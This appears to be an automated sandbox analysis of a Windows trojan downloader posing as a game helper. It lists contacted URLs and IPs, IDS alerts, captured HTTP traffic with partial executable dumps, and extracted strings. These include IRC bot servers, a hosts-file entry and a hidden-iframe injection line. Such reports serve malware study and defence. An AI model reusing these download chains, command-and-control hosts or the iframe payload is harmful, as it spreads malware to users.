hxxp://www.xxdtec.com/winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf273346271357355270352363270250366372v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 118.192.75.167
hxxp://zw.cn170.com/ws.exe 58.221.60.133
hxxp://www.xxdtec.com/winapp/manager/onlinefirst.php?user=xtsszs_qn2.&mac=000C29EC7FC5 118.192.75.167
hxxp://union.yoyolm.net/tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hxxp://ya.ru/&url2=hxxp://dasf.cn/ 222.186.130.92
hxxp://down.tianyunxj.com/6/tqrl_90_4090.exe 116.11.254.249
hxxp://www.xxdtec.com/winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf............v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 118.192.75.167
hxxp://update.yoyolm.net/0815/help1.html 116.11.254.249
hxxp://down2.uc.cn/pcbrowser/down.php?pid=4299 211.103.82.247
hxxp://uu.cn170.com/y.txt?6537536855
hxxp://uu.cn170.com/ws.exe
web.51.la 117.21.226.40
chinaljndk.3322.org 58.221.60.133


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET TROJAN IRC Nick change on non-standard port
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Traffic

GET /icon_7.gif HTTP/1.1
Accept: */*
Referer: hXXp://zw.cn170.com/tj.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.ajiang.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=14400
Content-Length: 922
Content-Type: image/gif
Last-Modified: Fri, 26 May 2006 14:27:28 GMT
Accept-Ranges: bytes
ETag: "088d583d080c61:1496"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:53 GMT
Connection: close
GIF89a0.............`..?..>.. ....|..........................!..NET
SCAPE2.0.....!.......,....0........I..8.!........!1.b..0)..g.-..x.. .o
%......$X.q;.0.|..6....q{[email protected]'....H'O....yj..5.*..............
..4.A:Pop...........M9;:.J..........H$... H...........8......A........
.......!.......,....*.....^..1)..^....H..4!...l{Ic)..Y....d...I.3<.
^...`*,..g..]"......>..&4..z.O.5<&.....4...p.J^....z ..!.......,
....-.....l.!1)...k.. xI..U^..$..... .~e.vg..3.....FF.p.C.B.')j.Pc..q.
.YO..$:0N..T.B.|.O..GCz......g.x4...d...~...V..4..!.......,....-.....d
..1)...k.. [email protected]._.........[[email protected]#bN. .P.....S..2.W..2.>.P....
..fO...V..r.(.K..L^....-x{.|...-..!.......,....-.....w.!1)...k.. xI..U
^.....c.j.:|7..Yw..[.1..z.c(HD...fk( .,.k.d............ ;.^w..s...sZJ.
{...5bb.ghClzC....5..n..k...Y..5..!.......,....-.....o..1)...k.. xI.@l
.G._...;"gG....r*f........ ....n...)......[.v.. B,..3./W....Yl5'9Z.m..
<....}V.o.}....t.......9..;..



GET /17048312.js HTTP/1.1
Accept: */*
Referer: hXXp://zw.cn170.com/tj.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1980
Content-Type: application/x-javascript
Last-Modified: Wed, 16 Jul 2014 03:29:10 GMT
Accept-Ranges: bytes
ETag: "2ce8d71ba6a0cf1:197d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:18 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?17048312" target="_blan
k"><img alt="51.la 专业
;、免费、强健的访•
EE;统计" src="hXXp://icon.ajiang.net/icon_7.gif" style="bo
rder:none" /></a>\n');..var a8312tf="51la";var a8312pu="";var
 a8312pf="51la";var a8312su=window.location;var a8312sf=document.refer
rer;var a8312of="";var a8312op="";var a8312ops=1;var a8312ot=1;var a83
12d=new Date();var a8312color="";if (navigator.appName=="Netscape"){a8
312color=screen.pixelDepth;} else {a8312color=screen.colorDepth;}..try
{a8312tf=top.document.referrer;}catch(e){}..try{a8312pu =window.parent
.location;}catch(e){}..try{a8312pf=window.parent.document.referrer;}ca
tch(e){}..try{a8312ops=document.cookie.match(new RegExp("(^| )AJSTAT_o
k_pages=([^;]*)(;|$)"));a8312ops=(a8312ops==null)?1: (parseInt(unescap
e((a8312ops)[2])) 1);var a8312oe =new Date();a8312oe.setTime(a8312oe.g
etTime() 60*60*1000);document.cookie="AJSTAT_ok_pages=" a8312ops  ";pa
th=/;expires=" a8312oe.toGMTString();a8312ot=document.cookie.match(new
 RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a8312ot==null){a8312o
t=1;}else{a8312ot=parseInt(unescape((a8312ot)[2])); a8312ot=(a8312ops=
=1)?(a8312ot 1):(a8312ot);}a8312oe.setTime(a8312oe.getTime() 365*24*60
*60*1000);document.cookie="AJSTAT_ok_times=" a8312ot ";path=/;expires=
" a8312oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a8312
ops=-1;a8312ot=-1;}}catch(e){}..a8312of=a8312sf;if(a8312pf!=="51la
<<< skipped >>>


GET /ico.ico HTTP/1.0
Host: VVV.meimotuan.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:52 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 18 Jun 2014 06:03:51 GMT
ETag: "e8901-25be-4fc16063d5483"
Accept-Ranges: bytes
Content-Length: 9662
Connection: close
Content-Type: image/vnd.microsoft.icon
......00.... ..%......(...0...`..... ......$...................}...}..
.}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...|...~
.......}...q...c..._...`...`..._...^...^...^...^...^...^...^...^...^..
.^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}
...}...}...}...}...}...}...}...}...}...}...~.......{...e...V...V...Y..
.X..}S..}R...Y..._...`...^...^...^...^...^...^...^...^...^...^...^...^
...^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}...}..
.}...}...}...}...}.......}...j...[...............................o..~U
...W..._..._...^...^...^...^...^...^...^...^...^...^...^...^...^...^..
.^...^...}...}...}...}...}...}...}...}...}...}...}...}...}...|...~...~
...t..._...`...........................................x..}T...\...`..
.^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}
...}...}...}...}...}...}...}...}...}...}.......{...i...\..~V..........
.............................................\...Y...`...^...^...^...^
...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}..
.}...}...}...|...~.......v...b...]..~V...{............................
...............................c...Y...`...^...^...^...^...^...^...^..
.^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}.......}
...n...^...\...a..zR..................................................
................._...[..._...^...^...^...^...^...^...^...^...^...^...^
...^...}...}...}...}...}...}...}...}...~...~...t...d...\...^...^...a..
zQ................................................................
<<< skipped >>>


GET /winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf............v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.xxdtec.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Thu, 16 Oct 2014 21:27:12 GMT
....


GET /winapp/manager/onlinefirst.php?user=xtsszs_qn2.&mac=000C29EC7FC5 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.xxdtec.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Charset: big5, big5-hkscs, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3,



GET /tj.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: zw.cn170.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 314
Content-Type: text/html
Last-Modified: Mon, 19 May 2014 16:33:12 GMT
Accept-Ranges: bytes
ETag: "2682478073cf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:14 GMT
<script language="javascript" type="text/javascript" src="hXXp://js
.users.51.la/17048312.js"></script>..<noscript><a hr
ef="hXXp://VVV.51.la/?17048312" target="_blank"><img alt="ء
1;要啦免费统计" src="hXXp://img.us
ers.51.la/17048312.asp" style="border:none" /></a></noscri
pt>..



GET /y.txt?6537536855 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: uu.cn170.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 189
Content-Type: text/plain
Last-Modified: Mon, 13 Oct 2014 14:52:14 GMT
Accept-Ranges: bytes
ETag: "a6f547f5e6cf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:14 GMT
hXXp://down.tianyunxj.com/6/tqrl_90_4090.exe..hXXp://xtsszs.oss-cn-han
gzhou.aliyuncs.com/xtsszs_qn2.exe..hXXp://down2.uc.cn/pcbrowser/down.p
hp?pid=4299..hXXp://uu.cn170.com/ws.exe..........


GET /ws.exe HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: uu.cn170.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 73821
Content-Type: application/octet-stream
Last-Modified: Thu, 02 Oct 2014 03:07:13 GMT
Accept-Ranges: bytes
ETag: "ca4c18f7edddcf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:27:01 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......(.$.l.J}l.J}
l.J}..A}m.J}..D}o.J}..@}g.J}..N}n.J}...}a.J}l.K}0.J}..A}i.J}..L}m.J}Ri
chl.J}................PE..L......S.....................`.......Q......
[email protected]....................................
.......... ............!..............................................
.............................................................Buffer.P.
.......................... ..`.Ddos....'... ...0... .............. ..`
.text...Z....P.......P.............. ..`.Breakth.....`.......`........
...... ..`.Socket. ....p.......p.............. ..`.SocketB.,.......0..
................ ..`.Attack............................. ..`.rdata..P.
....... ..................@[email protected]...@...........................@...
.rsrc....!.......0..................@..@..............................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hXXp://ya.ru/&url2=hXXp://dasf.cn/ HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: union.yoyolm.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.3.24
Set-Cookie: yuyuapi=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Content-type: text/html
Content-Length: 89
..."%local server IP%"35..<meta http-equiv="Content-Type" content="text/h
tml; charset=utf-8">....



GET /pcbrowser/down.php?pid=4299 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down2.uc.cn
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 16 Oct 2014 21:27:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://umcdn.uc.cn/down/4299/Browser_V3.0.1644.0_r_4299_(Build14101116).exe
0..



GET /0815/help1.html HTTP/1.0
Host: update.yoyolm.net
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:51 GMT
Content-Length: 538
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 07:24:49 GMT
Connection: Close
ETag: "e47ee24ffcbcf1:67c"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: MISS from cnc-sd-153-132.fcd, DISK HIT from ctl-gx-254-145.fcd
TRW2VjdF0KODY9MQo4Nz0xCjg4PTEKODk9MQo5MD0xCjkxPTEKOTI9MQo5Mz0xCjk0PTEK
OTU9MQo5Nj0xCjk3PTEKOTg9MQo5OT0xCjEwMD0xCjEwMT0xCjE1MD0xCjE1MT0xCjE1Mj
0xCjE1Mz0xCjE1ND0xCltnXQowPTEKW3BhXQowPTEKW2kxXQowPTEKW2kyXQowPee juiY
keWboui0rQpbaTNdCjA9aHR0cDovL3d3dy5tZWltb3R1YW4uY29tL2ljby5pY28KW2k0XQ
owPW1tdC5pY28KW2k1XQowPWh0dHA6Ly93d3cubWVpbW90dWFuLmNvbS8/cmwKW3NuYW1m
MV0KMD00CltzbmFtZjJdCjA9NApbc25hbV0KMD0zCltzanMzXQowPTEwCltyZWNdCjA9aH
R0cDovL2RsLjM2MHNhZmUuY29tL3AvU2V0dXBfb2VtcWQ1MS5leGUKW2Rpcl0KMD1TZXR1
cF9vZW1xZDUxLmV4ZQpbZHNjXQowPS9TCltlZF0KRTA9MQ==..



GET /xtsszs_qn2.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xtsszs.oss-cn-hangzhou.aliyuncs.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:27:02 GMT
Content-Type: application/octet-stream
Content-Length: 842664
Connection: close
Accept-Ranges: bytes
ETag: "EB6DBA81F98D5C0DDFF2104289EA7BD3"
Last-Modified: Fri, 10 Oct 2014 07:19:34 GMT
Server: AliyunOSS
x-oss-request-id: 544038264BBECED823554E64
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
....J.......J...........%....:.......:.......:......Rich..............
......PE..L......P.................r...j...B...8............@.........
................................................................@.....
......................................................................
.............................................text....q.......r........
.......... ..`.rdata..n .......,...v..............@[email protected].... ......
....................@....ndata...................................rsrc.
..............................@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected].....@
..}[email protected]... M.........3..M.....FQ.....NU..M.....
[email protected][email protected]
....E..9}[email protected].}[email protected]..
[email protected][email protected] [email protected].....@._^3.
[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G...
..t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ.U.S....G.V.
<<< skipped >>>


GET /6/tqrl_90_4090.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.tianyunxj.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:32 GMT
Content-Length: 3098224
Content-Type: application/octet-stream
Last-Modified: Sat, 13 Sep 2014 01:10:57 GMT
Connection: Keep-Alive
ETag: "6c7c992efcecf1:1823"
Content-Location: hXXp://down.tianyunxj.com/setup.exe?404;hXXp://down.tianyunxj.com:80/6/tqrl_90_4090.exe
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: DISK HIT from ctl-zj-205-074.fcd, DISK HIT from ctl-gx-254-145.fcd
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......B.e|.../.../
.../.../.../..T/.../..V/.../.../.../R.;/.../e.!/.../.../.../..Q/.../Ri
ch.../........................PE..L......N.................t..........
.>[email protected]................
..................................k.......... )/.P....................
......................................................................
..text....s.......t.................. ..`.rdata..Z............x.......
.......@[email protected][email protected]...`...`.....
......................rsrc....k.......l..................@..@.........
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
....._B..H.P.u..u..u...\[email protected]._B..E.WP.u...`[email protected]...
d.@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...h.@
..u....E..9}[email protected].}[email protected]
[email protected][email protected] [email protected].@._
^3.[.....L$..(_B...Si.....VW.T.....tO.q.3.;5,_B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5,_B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe_1324:




.text
.rdata
@.data
.rsrc
t$(SSh
~%UVW
.tTPV
FTPjK
FtPj;
F.PjRWj
u.WWj
u.VVj
u$SShe
wininet.dll
SkinH_EL.dll
psapi.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
hXXp://VVV.wei235.com/xixi/8.13.1.txt
hXXp://VVV.wei235.com/xbb.txt
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
hXXp://
%s;7*
0%x@w
%C^L:
%s T5
]E4%F(
.Funr
k%UPp
fg.VG
%C',@
>Ùd
0'.Ll
[I(3/#N0.bd
j"%u=w
q%Xn`
@|H.NI
.wdd!
S|%u4
*.Ea]S
Q.CGo
fTpe
.LLbX
-.Mdl
\-A}=3K
Y:.akpS
$.Zcqn
u.Jck~
zx/%FN[
ce_%D
%C@0H
%s=\RI
}j%c%Y)
Rx.GR
4o#.dM
IeS`%C
[n 4\.UY 
,4.qO,
gQ'.Io
%cLur?
s%DHB
]I%%X
5r.US
:mD].tB
f%fUZ
.fOuV12
*_.dC
&-N}<
({?.cQm
.Cqx~c
.`.Qw
**.dU
!n]%x
%X,Cr
&.PFy{xh
.um ZZE7L
/^p%u$
I.NoQY
zu.ew
D/.nT
q.7.qE
W>^T%S
%XiR^
1%SqlnD
U[5%u
.OW74
"E.jV
c T.Om
*U%XOd
D%FW@
.gM>$slt
B.iR%
vv#%sY7x
.TY3F
kEY94
.nyBK
wN%U/
4.Ky%t
.h.fO
.TK$N
%dRB:W
[I9%f
8o%sx
.WE= T!N
#?%s(C(
Rd.hYp
.TX=6
,%x)E
R%X4C (
$7.Gs
d,.bw p
o .Kb
KOz-%c Rd
zkey0
=.Lw/Ch
!c%SGd
A.YA'
`.yV8
.qL8d0{
m>[So;.yd] 
_ÎW,
%UZtQ
.Fu:#
SShXuy@
f.kz"
@o.Ns
i.IK(
9rBÀ
.nm[&
.DDU0
%f$8C
\SkinH_EL.dll
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
\dm.dll
!!"#$%&'()) 
ll%X`$Y\
%Cr#l$rQ2$d%$
.nu':
M_%UHI=
;<.dJ
Am%Xx
D<\$ %XQ&
dlSQL
M CmD$L
((;|$ #(`
uF.BH:
t4u-4Z}>T
wQ.Bq
.AC:%
J.rE\j
%f; )c=
dE.Nn
TSSWPc.Th`
.xL$d
7z.tu
&%9SD
.VA`D
jY.kl
o8%dV
VGz%FrE
uù u
.BNFq{
-hO}]QV:
456789:;<=
!"#$%&'()* ,-./0123
deflate 1.2.3 C
en executed
p out of range,W %s
I>support g
X:
UxTheme.dll
?HttpCli
%scode,
3,%s,%d
?.PAVCExcepS,(N
' %d.
.1.2600.441~
PSAPI.DLLU%fW
88.185.3
P129.6.15.29
202.120.
\\.\%c
<%s>!
~g%s#$A
[%d]G
./*.bmp
log.tx
32778cpublic.inject.
d8 keypad
ck.ap
.=.minmax
x.cfake`!K
km.prot
hreaD%s
on.Leve
wKeyboard
Scsi%d:
1.2.24
.Fe(H;
: %s6
= (%d/
gx=%f, gy
%ld, pass G
orm.de6
O%dhx%dv qV
D=%u, "
z %4u
%ld%c$HV
 -t.SSSj
MSVCRT
ntoskrnl.exQ
8)939@9|9
%cGpS
.Hs;0E<
#6.BN
PI.DLLK04e
Ä!w
%c-1IY
ÈA/
Ë!b
.FLd{
%DxMr
úC~
.K.kn
.LP.,
;.0%U
n%cp,
.p.lMp
-17x3}hv
n.vg(
.os)H
-.rl2Ql
.NSx#
.QB-N
/i.Kn
.wCdn
&SÓ
2r.Qn
O,0.lmq
appingUWindowsDir
.Increm^
BkÝPtoLP
;Gw.one
ran%s
.PoDAttachnCp
.DJ-?O8
7G#V%F
(.text\
'@.tp0
{43C6DBBB-BEAD-4DFB-B6D2-52C5CDB5B70A} = s 'Dm'
'Dm.EXE'
val AppID = s {43C6DBBB-BEAD-4DFB-B6D2-52C5CDB5B70A}
dm.dmsoft = s 'dm.dmsoft'
CLSID = s '{26037A0E-7CBD-4FFF-9C63-56F2D0770214}'
CurVer = s 'dm.dmsoft'
ForceRemove {26037A0E-7CBD-4FFF-9C63-56F2D0770214} = s 'dm.dmsoft'
ProgID = s 'dm.dmsoft'
stdole2.tlbWWW
~cmdWd
KeyPress
.aKeyDownWd
MKeyUpWWWd
ShowScrMsgWW
msgWd
SetShowErrorMsgW
>SGetWindowStateWW
U@SetWindowSizeWWWd
SetWindowStateWWd
iRSetKeypadDelayWWd
BkeypadWW
SetExportDictWWWd
keyWd
FindWindowSuperW
qHKeyDownCharW
pOkey_strWd
KeyUpCharWWWd
KeyPressChard
KeyPressStrWd
EnableKeypadPatchWWWd
=PEnableKeypadSyncd
EnableRealKeypadd
GetKeyStateWd
[.ReadFiled
WaitKeyW
!key_coded
joEnumWindowSuperW
urlW
=EnableKeypadMsgWd
EnableMouseMsgWWd
method KeyPressWWW
method KeyDown
method KeyUpWW
method ShowScrMsgW
method SetShowErrorMsg
method GetWindowStateW
method SetWindowSizeWW
method SetWindowStateW
method SetKeypadDelayW
method SetExportDictWW
method FindWindowSuper
method KeyDownChar
method KeyUpCharWW
method KeyPressCharWWW
method KeyPressStr
method EnableKeypadPatchWW
method EnableKeypadSyncWWW
method EnableRealKeypadWWW
method GetKeyState
method WaitKey
method EnumWindowSuper
method EnableKeypadMsg
method EnableMouseMsgW
ADVAPI32.dll
IMM32.dll
MFC42.DLL
ole32.dll
OLEAUT32.dll
SHELL32.dll
VERSION.dll
WINMM.dll
WS2_32.dll
RegCloseKey
dm.dll
\dm.dll /s
[email protected]
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
portuguese-brazilian
iphlpapi.dll
SHLWAPI.dll
MPR.dll
RASAPI32.dll
GetProcessHeap
WinExec
GetWindowsDirectoryA
GetCPInfo
KERNEL32.dll
GetKeyState
GetKeyboardLayout
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
WINSPOOL.DRV
comdlg32.dll
RegOpenKeyExA
RegCreateKeyExA
ShellExecuteA
WSOCK32.dll
WININET.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
Service Pack %d
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows ??
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98
Windows 95 OSR2
Windows 95 SP1
Windows 95
Windows CE
Windows
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows NT
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
VVV.wei235.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CF
v5.6.exe
#include "l.chs\afxres.rc" // Standard components
ADVAPI32.DLL
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qooirc.zief.pl
proxim.ircgalaxy.pl
NICK wxbxymrj
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
1, 0, 6, 6
3, 1227, 0, 0
(*.*)
10.1.0.0
(hXXp://VVV.eyuyan.com)

CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe_1324_rwx_006DE000_00005000:




ADVAPI32.DLL
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qooirc.zief.pl
proxim.ircgalaxy.pl
NICK wxbxymrj
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
